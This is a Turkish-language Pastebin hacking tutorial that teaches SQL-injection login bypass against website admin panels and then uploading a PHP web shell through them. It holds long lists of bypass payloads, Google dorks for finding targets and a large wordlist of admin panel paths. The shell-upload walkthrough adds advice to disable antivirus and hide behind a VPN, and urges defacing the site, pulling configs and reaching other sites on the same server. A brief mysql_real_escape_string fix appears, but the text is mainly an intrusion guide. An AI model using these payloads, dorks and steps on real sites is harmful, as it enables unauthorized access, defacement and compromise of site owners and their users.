KingSkrupellos

SQL Kimlik Doğrulama ve Panelden Shell Yükleme Method

Sep 14th, 2017
274
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.03 KB | None | 0 0
  1. SQL Kimlik Doğrulamayla Yönetici Oturumu Açarak Panele Shell Yükleme
  2.  
  3. Selamün Aleyküm Sayın Deccal.Org Halkı yine yeni bir Hacking Güvenlik Makalesiyle karşınızdayım. KingSkrupellos * Deccal.Org !
  4.  
  5. Başlık =>
  6.  
  7. Türkçe => SQL Kimlik Doğrulamayla Yönetici Oturumu Açarak Panele Shell Yükleme Resimli Anlatım
  8.  
  9. İngilizce =>SQL Login Authentication Admin ByPass ile Panelden Shell Upload Vulnerability üzerine Geniş Anlatım
  10.  
  11. Bugün size SQL Enjeksiyon İzin Olmayan Admin Panellerde Yöneticiyi Atlaymayı resimli bir şekilde elimizden geldiğince göstermeye çalışacağım.
  12.  
  13. [img]http://i.resimyukle.xyz/eHN3.png[/img]
  14.  
  15. Ek Bilgi Vermek istiyorum =>
  16.  
  17. Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir.
  18. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır. Bu saldırı PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir.
  19. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.
  20. Amaç =>Yani PHP/ Microsoft yapısında SQL Query'de değişiklik yaparak sisteme dalmaktır :)
  21.  
  22. Sql Command Injection ile entegre çalışıyorda diyebilirim :)
  23.  
  24. Aynı yazıları birkaç kez yazmış gibi olucam ama kafanıza bu bilgileri iyice sokucam ki öğrenesiniz mantığını hıamına :D
  25.  
  26. PHP yapılanmasında böyle bir hata olduğunu varsayarsak => Açık burdan dolayı kaynaklanır :)
  27.  
  28. [code]<?php
  29. $sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $POST_['password'] . "'";
  30. response = mysql_query($sql);
  31. ?>[/code]
  32.  
  33. MySQL Query dilinde yukarıdaki yazdığım şu demek oluyor =>
  34.  
  35. [code]SELECT * FROM users WHERE user='' AND password='' < [/code]
  36.  
  37. demek istediğim ise şu =>
  38.  
  39. [code]Username=’admin’ AND Password=” OR ‘a’ = ‘a’ <[/code]
  40.  
  41. ifadesi
  42.  
  43. kullanıcı adı ve şifrenin doğru olduğunu gösteriyor. Sağlama yapmış olduk anlıyacağınız :)
  44.  
  45. Yani Hedefsitemizde Panele şifresiz giriş yapmış olduk =>
  46.  
  47. HEDEFSITE/administrator
  48.  
  49. K. Adı => admin
  50.  
  51. Şifre => ŞİFRESIZ GİRİŞ
  52.  
  53. Peki SQL Login Authorized ByPass açığı nasıl kapatılır ? Hemen göstereyim =>
  54.  
  55. \x00, \n, \r, \, ' bu ve bune benzer PHP kodlamalarındaki yazıları silmemiz gerekiyor.
  56.  
  57. Internette '' mysql_real_escape_string '' kelimeleri diye aratırsanız karşınıza bir sürü ingilizce yazı çıkar.
  58.  
  59. [code]<?php
  60. $username = mysql_real_escape_string($_POST["username"]);
  61. $password = mysql_real_escape_string($_POST["password"]);
  62. $sql = "SELECT * FROM users WHERE username='" . $username . "' AND password='" . $password . "'";
  63. $response = mysql_query($sql);
  64. ?>[/code]
  65.  
  66. Soru => Yönetici Paneline Dalmak için SQL'de Yönetici Nasıl Atlatılır ?
  67.  
  68. Cevap => SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir.
  69.  
  70. Amaç => Yönetici Paneline sanki Admin'miş gibi sisteme girmek ve Siteyi kendi isteğimiz üzerine kullanmak olucaktır.
  71.  
  72. Şöyle Düşünelim SQL ( Structured Query Language ) Dilinde Sitede SQL yapısında Yönetici Bey kendisine ait k.adı ve şifre oluşturmuş.
  73.  
  74. Ama bizim bunu şuan bilmemiz mümkün değil =>
  75.  
  76. Kullanıcı => administrator
  77.  
  78. Şifre => admin123456789
  79.  
  80. diye oluşturduğunu varsayarsak =>
  81.  
  82. [code]SELECT USER from database WHERE username=’administrator’ AND password=’admin123456789′ [/code]
  83.  
  84. Peki Sql Login Authentication ByPass açığında Heykır abimiz sisteme nasıl dalar ?
  85.  
  86. Sebebi => Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında hata oluşmasından dolayıdır.
  87.  
  88. [code]SELECT USER from database WHERE username=’hi" or 1=1 --’ or 1=1– AND password=”hi" or 1=1 --[/code]
  89.  
  90. Kullanıcı Adı => hi" or 1=1 --
  91.  
  92. Şifre => hi" or 1=1 --
  93.  
  94. olarak belirlemiş olduk.
  95.  
  96. Ve Sisteme Güvenli bir şekilde girmiş olduk.
  97.  
  98. Not => Bu arada VPN ( IP Adres Değiştirici ) tarayıcı eklentilerini kullanmayıda unutmayın. Gafil avlanmayın yani.
  99.  
  100. Şimdi ise SQL Enjeksiyon Login Atlatmadaki Hileler =>
  101.  
  102. Mantık kısmı burası işte =>
  103.  
  104. Yani name ve password kısmında yerleri HEDEFSITE/adminpanel.php yolunda yazdığımızı düşünelim =>
  105.  
  106. K. Adı => tom
  107.  
  108. Şifre => or 1='1
  109.  
  110. ile Admin Paneline girmiş olucaz :)
  111.  
  112. [code]1) SELECT * FROM users
  113. WHERE name='tom'
  114. and password='tom'
  115.  
  116. 2) SELECT * FROM users
  117. WHERE name='tom'
  118. and password='' or '1'='1'
  119.  
  120. 3) SELECT * FROM users
  121. WHERE name='tom'
  122. and password='' or 1='1'
  123.  
  124. 4) SELECT * FROM users
  125. WHERE name='tom'
  126. and password='' or 1=1-- -'
  127.  
  128. 5) SELECT * FROM users
  129. WHERE name='' or '1'='1'
  130. and password='' or '1'='1'
  131.  
  132. 6) SELECT * FROM users
  133. WHERE name='' or ' 1=1'
  134. and password='' or ' 1=1'
  135.  
  136. 7) SELECT * FROM users
  137. WHERE name='1' or 1=1 -- -' [/code]
  138.  
  139. Peki SQL Login Authentication ByPass açığı nasıl ve nerden kaynaklanır ?
  140.  
  141. Kullanıcı => uname
  142.  
  143. Şifre => passwrd
  144.  
  145. olduğunu PHP kodunda düşünürsek =>
  146.  
  147. [code]$uname=$_POST['uname'];
  148. $passwrd=$_POST['passwrd'];
  149. $query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
  150. $result=mysql_query($query);
  151. $rows = mysql_fetch_array($result);
  152. if($rows)
  153. {
  154. echo "Başarıyla Giriş Yaptınız - KingSkrupellos Deccal.Org" ;
  155. create_session();
  156. }
  157. else
  158. {
  159. Echo "Şansına küs bir sonraki sefere yeniden dene";
  160. }[/code]
  161.  
  162. Şimdi Hedef Belirlediğimiz Sisteme Aşağdaki verdiğim kodları baz alarak giriş yapmayı adım adım takip edin =>
  163.  
  164. ' or ''='
  165. ' or ''='
  166.  
  167. 1) select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;
  168.  
  169. 2) select username,pass from users where username='' or true--' and password='' or ''='' limit 0,1;
  170.  
  171. 3) select username,pass from users where username='' or true;
  172.  
  173. 4) select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;
  174.  
  175. burda SQL Injection ByPass olmaya başladı bile => hemen denemesine geçelim =>
  176.  
  177. ') or true--
  178. ') or ('')=('
  179. ') or 1--
  180. ') or ('x')=('
  181.  
  182. 5) select username,pass from users where username="$username" and password="$passwrd" limit 0,1;
  183.  
  184. " or true--
  185. " or ""="
  186. " or 1--
  187. " or "x"="
  188.  
  189. 6) select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;
  190.  
  191. ") or true--
  192. ") or ("")=("
  193. ") or 1--
  194. ") or ("x")=("
  195.  
  196. 7) select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;
  197.  
  198. ')) or true--
  199. ')) or ((''))=(('
  200. ')) or 1--
  201. ')) or (('x'))=(('
  202.  
  203. Ve en sonunda Admin Paneline giriş yapmayı başardık. Ve Yönetici Panelinde Dosya Editleme - Dosya Yükleme - Kodları düzenleyip
  204.  
  205. indeximizde çakarız. Shell yükleyip serverdaki aynı IP adresindeki diğer sitelere kolayca ulaşabiliriz :)
  206.  
  207. HEDEFSITE/adminlogin.asp
  208.  
  209. olduğunu düşünürsek
  210.  
  211. Kullanıcı Adı => ')) or (('x'))=(('
  212.  
  213. Şifre => ')) or (('x'))=(('
  214.  
  215. Peki aklınızdaki en ufak soruyu tahmin edebiliyorum =>
  216.  
  217. Peki bu SQL Inj Dorkunu nasıl bulabilirim usta KingSkrupellos diyeceksiniz şimdi ?
  218.  
  219. Basit bir şekilde hemen bir Google Dork oluşturdum =>
  220.  
  221. [code]inurl:admin/index.php
  222. inurl:administrator.php
  223. inurl:administrator.asp
  224. inurl:login.asp
  225. inurl:login.aspx
  226. inurl:login.php
  227. inurl:admin/index.php
  228. inurl:adminlogin.aspx[/code]
  229.  
  230.  
  231. Aşağıda verdiğim special karekterleri, bulduğumuz yönetici panelini dizine hem Kullanıcı Adına hemde Şifreye aynısını girdiğimiz vakit paneldeyiz demektir.
  232.  
  233. ASP Siteler için SQL Injection Login Bypass =>
  234.  
  235. [hide][code]' or '1'='1
  236. ' or 'x'='x
  237. ' or 0=0 --
  238. " or 0=0 --
  239. or 0=0 --
  240. ' or 0=0 #
  241. " or 0=0 #
  242. or 0=0 #
  243. ' or 'x'='x
  244. " or "x"="x
  245. ') or ('x'='x
  246. ' or 1=1--
  247. " or 1=1--
  248. or 1=1--
  249. ' or a=a--
  250. " or "a"="a
  251. ') or ('a'='a
  252. ") or ("a"="a
  253. hi" or "a"="a
  254. hi" or 1=1 --
  255. hi' or 1=1 --
  256. 'or'1=1'
  257. ==
  258. and 1=1--
  259. and 1=1
  260. KingSkrupellos - Deccal.Org
  261. ' or 'one'='one--
  262. ' or 'one'='one
  263. ' and 'one'='one
  264. ' and 'one'='one--
  265. 1') and '1'='1--
  266. admin' --
  267. admin' #
  268. admin'/*
  269. or 1=1--
  270. or 1=1#
  271. or 1=1/*
  272. ) or '1'='1--
  273. ) or ('1'='1--
  274. ' or '1'='1
  275. ' or 'x'='x
  276. ' or 0=0 --
  277. " or 0=0 --
  278. or 0=0 --
  279. ' or 0=0 #
  280. " or 0=0 #
  281. or 0=0 #
  282. ' or 'x'='x
  283. " or "x"="x
  284. ') or ('x'='x
  285. ' or 1=1--
  286. " or 1=1--
  287. KingSkrupellos - Deccal.Org
  288. or 1=1--
  289. ' or a=a--
  290. " or "a"="a
  291. ') or ('a'='a
  292. ") or ("a"="a
  293. hi" or "a"="a
  294. hi" or 1=1 --
  295. hi' or 1=1 --
  296. 'or'1=1'
  297. or 1=1
  298. or 1=1--
  299. or 1=1#
  300. or 1=1/*
  301. admin' --
  302. admin' #
  303. admin'/*
  304. admin' or '1'='1
  305. admin' or '1'='1'--
  306. admin' or '1'='1'#
  307. admin' or '1'='1'/*
  308. admin'or 1=1 or ''='
  309. admin' or 1=1
  310. admin' or 1=1--
  311. admin' or 1=1#
  312. admin' or 1=1/*
  313. admin') or ('1'='1
  314. admin') or ('1'='1'--
  315. admin') or ('1'='1'#
  316. admin') or ('1'='1'/*
  317. admin') or '1'='1
  318. admin') or '1'='1'--
  319. admin') or '1'='1'#
  320. KingSkrupellos - Deccal.Org
  321. admin') or '1'='1'/*
  322. admin" --
  323. admin" #
  324. admin"/*
  325. admin" or "1"="1
  326. admin" or "1"="1"--
  327. admin" or "1"="1"#
  328. admin" or "1"="1"/*
  329. admin"or 1=1 or ""="
  330. admin" or 1=1
  331. admin" or 1=1--
  332. admin" or 1=1#
  333. admin" or 1=1/*
  334. admin") or ("1"="1
  335. admin") or ("1"="1"--
  336. admin") or ("1"="1"#
  337. admin") or ("1"="1"/*
  338. admin") or "1"="1
  339. admin") or "1"="1"--
  340. admin") or "1"="1"#
  341. admin") or "1"="1"/*
  342. ' or 0=0 --
  343. admin
  344. ' or '1'='1
  345. ' or 1='1
  346. 1' or 1=1 -- -
  347. ' or '1'='1
  348. ' or ' 1=1
  349. 1' or 1=1 -- -
  350. ' or ' 1=1
  351. anything' OR 'x'='x[/code]
  352.  
  353. Diğer bana ait Login Atlatma Kodları =>
  354.  
  355. [code]'-'
  356. ' '
  357. '&'
  358. '^'
  359. '*'
  360. ' or ''-'
  361. ' or '' '
  362. ' or ''&'
  363. ' or ''^'
  364. ' or ''*'
  365. "-"
  366. " "
  367. "&"
  368. "^"
  369. "*"
  370. " or ""-"
  371. " or "" "
  372. " or ""&"
  373. " or ""^"
  374. " or ""*"
  375. or true--
  376. " or true--
  377. ' or true--
  378. ") or true--
  379. ') or true--
  380. ' or 'x'='x
  381. ') or ('x')=('x
  382. ')) or (('x'))=(('x
  383. " or "x"="x
  384. ") or ("x")=("x
  385. ")) or (("x"))=(("x
  386. ' OR 'a' = 'a
  387. '-'
  388. ' '
  389. '&'
  390. '^'
  391. '*'
  392. ' or ''-'
  393. ' or '' '
  394. ' or ''&'
  395. ' or ''^'
  396. ' or ''*'
  397. "-"
  398. " "
  399. "&"
  400. "^"
  401. "*"
  402. " or ""-"
  403. " or "" "
  404. " or ""&"
  405. " or ""^"
  406. " or ""*"
  407. or true--
  408. " or true--
  409. ' or true--
  410. ") or true--
  411. ') or true--
  412. ' or 'x'='x
  413. ') or ('x')=('x
  414. ')) or (('x'))=(('x
  415. " or "x"="x
  416. ") or ("x")=("x
  417. ")) or (("x"))=(("x
  418. ''Or'='Or''
  419. 1'or'1'='1
  420. ' or 1=1 or ''='
  421. " or 1=1 or ""="
  422. ' OR ''='
  423. '' OR ''=''
  424. 'OR''='
  425. hey' or 1=1–
  426. ''Or 1 = 1'
  427. ' or 1=1--
  428. or 1=1--
  429. " or 1=1--
  430. or 1=1--
  431. ' or 'a'='a
  432. " or "a"="a
  433. ') or ('a'='a
  434. hi") or ("a"="a
  435. 'hi' or 'x'='x';
  436. x' or 1=1 or 'x'='y
  437. \x27\x4F\x52 SELECT *
  438. \x27\x6F\x72 SELECT *
  439. 'or select *
  440. admin'--
  441. ")) or (("x"))=(("x
  442. " or ""+"
  443. admin"or 1=1 or ""="
  444. admin") or ("1"="1"--[/code]
  445.  
  446. Örnek Admin Panel Uzantıları =>
  447.  
  448. [code]/login/web_manage.asp
  449. /login-admin.asp
  450. /adminlogin.asp
  451. /admin/adminLogin.asp
  452. /admin/login.php
  453. /admin/login.asp
  454. /admin/login.aspx
  455. /admin/login.html
  456. /admin
  457. /yonetim
  458. /panel
  459. /kontrolpanel
  460. /administrator
  461. /giris
  462. /login
  463. /superadmin
  464. /controlpanel
  465. /yonetici
  466. /giris.asp
  467. /yonetim.asp
  468. /login.asp
  469. /yonetici.asp
  470. /panel.asp
  471. adm
  472. admincp
  473. admcp
  474. cp
  475. modcp
  476. moderatorcp
  477. adminare
  478. admins
  479. admin1.php
  480. admin1.html
  481. admin2.php
  482. admin2.html
  483. yonetim.php
  484. yonetim.html
  485. yonetici.php
  486. yonetici.html
  487. ccms/
  488. ccms/login.php
  489. ccms/index.php
  490. maintenance/
  491. webmaster/
  492. adm/
  493. configuration/
  494. configure/
  495. websvn/
  496. admin/
  497. admin/account.php
  498. admin/account.html
  499. admin/index.php
  500. admin/index.html
  501. admin/login.php
  502. admin/login.html
  503. admin/home.php
  504. admin/controlpanel.html
  505. admin/controlpanel.php
  506. admin.php
  507. admin.html
  508. administrator/
  509. administrator/index.html
  510. administrator/index.php
  511. administrator/login.html
  512. administrator/login.php
  513. administrator/account.html
  514. administrator/account.php
  515. administrator.php
  516. administrator.html
  517. login.php
  518. login.html
  519. modelsearch/login.php
  520. moderator.php
  521. moderator.html
  522. moderator/login.php
  523. moderator/login.html
  524. moderator/admin.php
  525. moderator/admin.html
  526. moderator/
  527. account.php
  528. account.html
  529. admincontrol.php
  530. admincontrol.html
  531. adminpanel.php
  532. adminpanel.html
  533. admin1.asp
  534. admin2.asp
  535. yonetim.asp
  536. yonetici.asp
  537. admin/account.asp
  538. admin/index.asp
  539. admin/login.asp
  540. admin/home.asp
  541. admin.asp
  542. administrator/index.asp
  543. administrator/login.asp
  544. administrator/account.asp
  545. administrator.asp
  546. login.asp
  547. modelsearch/login.asp
  548. moderator.asp
  549. moderator/login.asp
  550. moderator/admin.asp
  551. account.asp
  552. controlpanel.asp
  553. admincontrol.asp
  554. adminpanel.asp
  555. fileadmin/
  556. fileadmin.php
  557. fileadmin.asp
  558. fileadmin.html
  559. administration/
  560. administration.php
  561. administration.html
  562. sysadmin.php
  563. sysadmin.html
  564. phpmyadmin/
  565. myadmin/
  566. sysadmin.asp
  567. sysadmin/
  568. ur-admin.asp
  569. ur-admin.php
  570. ur-admin.html
  571. ur-admin/
  572. Server.php
  573. Server.html
  574. Server.asp
  575. Server/
  576. wp-admin/
  577. administr8.php
  578. administr8.html
  579. administr8/
  580. administr8.asp
  581. webadmin/
  582. webadmin.php
  583. webadmin.asp
  584. webadmin.html
  585. administratie/
  586. admins/
  587. admins.php
  588. admins.asp
  589. admins.html
  590. administrivia/
  591. Database_Administration/
  592. WebAdmin/
  593. useradmin/
  594. sysadmins/
  595. admin1/
  596. system-administration/
  597. administrators/
  598. pgadmin/
  599. directadmin/
  600. staradmin/
  601. ServerAdministrator/
  602. SysAdmin/
  603. administer/
  604. LiveUser_Admin/
  605. sys-admin/
  606. typo3/
  607. panel/
  608. cpanel/
  609. cPanel/
  610. cpanel_file/
  611. platz_login/
  612. rcLogin/
  613. blogindex/
  614. formslogin/
  615. autologin/
  616. support_login/
  617. meta_login/
  618. manuallogin/
  619. simpleLogin/
  620. loginflat/
  621. utility_login/
  622. showlogin/
  623. memlogin/
  624. members/
  625. login-redirect/
  626. sub-login/
  627. wp-login/
  628. login1/
  629. dir-login/
  630. login_db/
  631. xlogin/
  632. smblogin/
  633. customer_login/
  634. UserLogin/
  635. login-us/
  636. acct_login/
  637. admin_area/
  638. bigadmin/
  639. project-admins/
  640. phppgadmin/
  641. pureadmin/
  642. sql-admin/
  643. radmind/
  644. openvpnadmin/
  645. wizmysqladmin/
  646. vadmind/
  647. ezsqliteadmin/
  648. hpwebjetadmin/
  649. newsadmin/
  650. adminpro/
  651. Lotus_Domino_Admin/
  652. bbadmin/
  653. vmailadmin/
  654. Indy_admin/
  655. ccp14admin/
  656. irc-macadmin/
  657. banneradmin/
  658. sshadmin/
  659. phpldapadmin/
  660. macadmin/
  661. administratoraccounts/
  662. admin4_account/
  663. admin4_colon/
  664. radmind-1/
  665. Super-Admin/
  666. AdminTools/
  667. cmsadmin/
  668. SysAdmin2/
  669. globes_admin/
  670. cadmins/
  671. phpSQLiteAdmin/
  672. navSiteAdmin/
  673. server_admin_small/
  674. logo_sysadmin/
  675. server/
  676. database_administration/
  677. power_user/
  678. system_administration/
  679. ss_vms_admin_sm/
  680. adminarea/
  681. bb-admin/
  682. adminLogin/
  683. panel-administracion/
  684. instadmin/
  685. memberadmin/
  686. administratorlogin/
  687. admin/admin.php
  688. admin_area/admin.php
  689. admin_area/login.php
  690. siteadmin/login.php
  691. siteadmin/index.php
  692. siteadmin/login.html
  693. admin/admin.html
  694. admin_area/index.php
  695. bb-admin/index.php
  696. bb-admin/login.php
  697. bb-admin/admin.php
  698. admin_area/login.html
  699. admin_area/index.html
  700. admincp/index.asp
  701. admincp/login.asp
  702. admincp/index.html
  703. webadmin/index.html
  704. webadmin/admin.html
  705. webadmin/login.html
  706. admin/admin_login.html
  707. admin_login.html
  708. panel-administracion/login.html
  709. nsw/admin/login.php
  710. webadmin/login.php
  711. admin/admin_login.php
  712. admin_login.php
  713. admin_area/admin.html
  714. pages/admin/admin-login.php
  715. admin/admin-login.php
  716. admin-login.php
  717. bb-admin/index.html
  718. bb-admin/login.html
  719. bb-admin/admin.html
  720. admin/home.html
  721. pages/admin/admin-login.html
  722. admin/admin-login.html
  723. admin-login.html
  724. admin/adminLogin.html
  725. adminLogin.html
  726. home.html
  727. rcjakar/admin/login.php
  728. adminarea/index.html
  729. adminarea/admin.html
  730. webadmin/index.php
  731. webadmin/admin.php
  732. user.html
  733. modelsearch/login.html
  734. adminarea/login.html
  735. panel-administracion/index.html
  736. panel-administracion/admin.html
  737. modelsearch/index.html
  738. modelsearch/admin.html
  739. admincontrol/login.html
  740. adm/index.html
  741. adm.html
  742. user.php
  743. panel-administracion/login.php
  744. wp-login.php
  745. adminLogin.php
  746. admin/adminLogin.php
  747. home.php
  748. adminarea/index.php
  749. adminarea/admin.php
  750. adminarea/login.php
  751. panel-administracion/index.php
  752. panel-administracion/admin.php
  753. modelsearch/index.php
  754. modelsearch/admin.php
  755. admincontrol/login.php
  756. adm/admloginuser.php
  757. admloginuser.php
  758. admin2/login.php
  759. admin2/index.php
  760. adm/index.php
  761. adm.php
  762. affiliate.php
  763. adm_auth.php
  764. memberadmin.php
  765. administratorlogin.php
  766. admin/admin.asp
  767. admin_area/admin.asp
  768. admin_area/login.asp
  769. admin_area/index.asp
  770. bb-admin/index.asp
  771. bb-admin/login.asp
  772. bb-admin/admin.asp
  773. pages/admin/admin-login.asp
  774. admin/admin-login.asp
  775. admin-login.asp
  776. user.asp
  777. webadmin/index.asp
  778. webadmin/admin.asp
  779. webadmin/login.asp
  780. admin/admin_login.asp
  781. admin_login.asp
  782. panel-administracion/login.asp
  783. adminLogin.asp
  784. admin/adminLogin.asp
  785. home.asp
  786. adminarea/index.asp
  787. adminarea/admin.asp
  788. adminarea/login.asp
  789. panel-administracion/index.asp
  790. panel-administracion/admin.asp
  791. modelsearch/index.asp
  792. modelsearch/admin.asp
  793. admincontrol/login.asp
  794. adm/admloginuser.asp
  795. admloginuser.asp
  796. admin2/login.asp
  797. admin2/index.asp
  798. adm/index.asp
  799. adm.asp
  800. affiliate.asp
  801. adm_auth.asp
  802. memberadmin.asp
  803. administratorlogin.asp
  804. siteadmin/login.asp
  805. siteadmin/index.asp
  806. ADMIN/
  807. paneldecontrol/
  808. login/
  809. cms/
  810. admon/
  811. ADMON/
  812. administrador/
  813. ADMIN/login.php
  814. panelc/
  815. ADMIN/login.html
  816. admin.
  817. login.htm
  818. login.
  819. admin/login.htm
  820. admin/home.
  821. admin/controlpanel.htm
  822. admin/cp.
  823. KingSkrupellos - Deccal.Org
  824. admin/adminLogin.htm
  825. admin/admin_login.
  826. admin/controlpanel.
  827. admin/admin-login.
  828. admin-login.
  829. admin/account.
  830. admin/admin.
  831. admin.htm
  832. adminitem/
  833. adminitem.
  834. adminitems/
  835. adminitems.
  836. administrator/login.
  837. administrator.
  838. administration.
  839. adminlogin.
  840. admin_area/admin.
  841. admin_area/login.
  842. manager/
  843. manager.
  844. letmein/
  845. letmein.
  846. superuser/
  847. superuser.
  848. access/
  849. access.
  850. sysadm/
  851. sysadm.
  852. superman/
  853. supervisor/
  854. panel.
  855. control/
  856. control.
  857. member/
  858. member.
  859. members.
  860. user/
  861. user.
  862. cp/
  863. uvpanel/
  864. manage/
  865. manage.
  866. management/
  867. management.
  868. signin/
  869. signin.
  870. log-in/
  871. log-in.
  872. log_in/
  873. log_in.
  874. sign_in/
  875. sign_in.
  876. sign-in/
  877. sign-in.
  878. users/
  879. users.
  880. accounts/
  881. KingSkrupellos
  882. accounts.
  883. bb-admin/login.
  884. bb-admin/admin.
  885. administrator/account.
  886. relogin.htm
  887. relogin.html
  888. check.
  889. relogin.
  890. blog/wp-login.
  891. user/admin.
  892. users/admin.
  893. registration/
  894. processlogin.
  895. checklogin.
  896. checkuser.
  897. checkadmin.
  898. isadmin.
  899. authenticate.
  900. authentication.
  901. auth.
  902. authuser.
  903. authadmin.
  904. cp.
  905. modelsearch/login.
  906. moderator.
  907. controlpanel.
  908. admincontrol.
  909. adminpanel.
  910. fileadmin.
  911. sysadmin.
  912. admin1.
  913. admin1.htm
  914. admin2.
  915. yonetim.
  916. yonetici.
  917. Deccal.Org
  918. ur-admin.
  919. Server.
  920. administr8.
  921. webadmin.
  922. admins.
  923. adm.
  924. admin_login.
  925. panel-administracion/login.
  926. pages/admin/admin-login.
  927. pages/admin/
  928. acceso.
  929. admincp/login.
  930. admincp/
  931. admincontrol/
  932. affiliate.
  933. adm_auth.
  934. memberadmin.
  935. administratorlogin.
  936. modules/admin/
  937. administrators.
  938. siteadmin/
  939. siteadmin.
  940. adminsite/
  941. kpanel/
  942. vorod/
  943. vorod.
  944. vorud/
  945. vorud.
  946. adminpanel/
  947. PSUser/
  948. secure/
  949. webmaster.
  950. autologin.
  951. userlogin.
  952. admin_area.
  953. cmsadmin.
  954. KingSkrupellos
  955. security/
  956. usr/
  957. root/
  958. secret/
  959. admin/login.
  960. admin/adminLogin.
  961. moderator/login.
  962. moderator/admin.
  963. 0admin/
  964. 0manager/
  965. aadmin/
  966. cgi-bin/login
  967. login1
  968. login_admin/
  969. login_admin
  970. login_out/
  971. login_out
  972. login_user
  973. loginerror/
  974. loginok/
  975. loginsave/
  976. loginsuper/
  977. loginsuper
  978. login
  979. logout/
  980. logout
  981. secrets/
  982. super1/
  983. super1
  984. super_index
  985. super_login
  986. supermanager
  987. superman
  988. superuser
  989. supervise/
  990. supervise/Login
  991. super[/code][/hide]
  992.  
  993. Şimdi gelelim Dananın kuyruğunun koptuğu yire ahaha hıamına :D Aşağıda Resimlerle birlikte geniş bir şekilde anlattım :)
  994.  
  995. Yani SQL Login Authentication Açığını iyice kavradıysanız ve mantığını anladiysanız SQL ile Shell Yükleme konusuna geçeceğim :)
  996.  
  997. HEDEFSITE'mizi Dorklardan belirlediğimizi varsayalım :D
  998.  
  999. Şöyle Olsun =>
  1000.  
  1001. [code]HEDEFSITE/yoneticipaneliburadaaq/index.php[/code]
  1002.  
  1003. Yukarıdaki SQL Loginlerden deneme yapıyoruz. Mesela bir tanesi dekkeldi ve panele girdik.
  1004.  
  1005. [code]Kullanıcı Adı => ")) or (("x"))=(("x
  1006.  
  1007. Şifre => ")) or (("x"))=(("x[/code]
  1008.  
  1009. Sitenin Yönetici Panelinde biraz geziyoruz.
  1010.  
  1011. Dosya Yükleyebileceğimiz yada .php dosya editleyebilecğimiz bir yer. Her ikiside Shell Yüklemeye izin verir yani
  1012.  
  1013. Neyse ben File Upload buldum SQL açığıyla girdiğim sitede :)
  1014.  
  1015. Konu Başlığını filen yazıyorum. deccal.php adlı shellimi siteye yüklüyorum. Siz istediğiniz şekilde shell dosyanınızı adlandırabilirsiniz.
  1016.  
  1017. PC'niz Shell yüklemeye izin vermiyorsa Antivirüs Programınızın Dosya koruması ve Internet Koruması bölümünü devre dışı bırakın ve yükleyin.
  1018.  
  1019. Ok. .php shell yüklendi. Şimdi sitenin neresini gittiği bulmak için => Duyurular bölümüne geliyorum. Download kısmına '' Bağlantıyı yeni sekmede açıyorum ''
  1020.  
  1021. Aman Tanrım Didim. O da ne ? Bizim Shell yüklenmiş.
  1022.  
  1023. Peki nerde mesela ;
  1024.  
  1025. [code]HEDEFSITE/işte-yüklenen-shell-dizin-bölümü/deccal.php[/code]
  1026.  
  1027. olsun ve aşağıda gördüğünüz gibi Shell'i görsel bir şekilde görüyorsunuz.
  1028.  
  1029. Index basın. Config çekin. Mass Atın. Diğer IP'deki sitelere ulaşın. Artık gerisi size kalmış
  1030.  
  1031. Olay işte bu kadar.
  1032.  
  1033. Resimli Anlatım Aşağıda Verilmiştir ( Deccal.Org )
  1034.  
  1035. [img]http://i.hizliresim.com/l3Z2AJ.jpg[/img]
  1036. [img]http://i.hizliresim.com/VPD5jZ.jpg[/img]
  1037. [img]http://i.hizliresim.com/njlVBV.jpg[/img]
  1038. [img]http://i.hizliresim.com/vXPdqz.jpg[/img]
  1039. [img]http://i.hizliresim.com/1VEmXj.jpg[/img]
  1040. [img]http://i.hizliresim.com/LZD7Lo.jpg[/img]
  1041. [img]http://i.hizliresim.com/r61B7m.jpg[/img]
  1042. [img]http://i.hizliresim.com/77DE4Y.jpg[/img]
  1043.  
  1044. Emeğe Saygı. Bu dökümanın tamamı '' KingSkrupellos - Deccal.Org '' aittir.
  1045.  
  1046. Lütfen kaynak göstererek alıntı yapınız.
  1047.  
  1048. Hacking ve Güvenlik konusunda bir sonraki makalede görüşmek üzere. Kendinize iyi bakın. Sağlıcakla kalın.
  1049.  
  1050. #### Mr. KingSkrupellos - Deccal.Org Digital Security Technological Turkish Army ###
Advertisement
Add Comment
Please, Sign In to add comment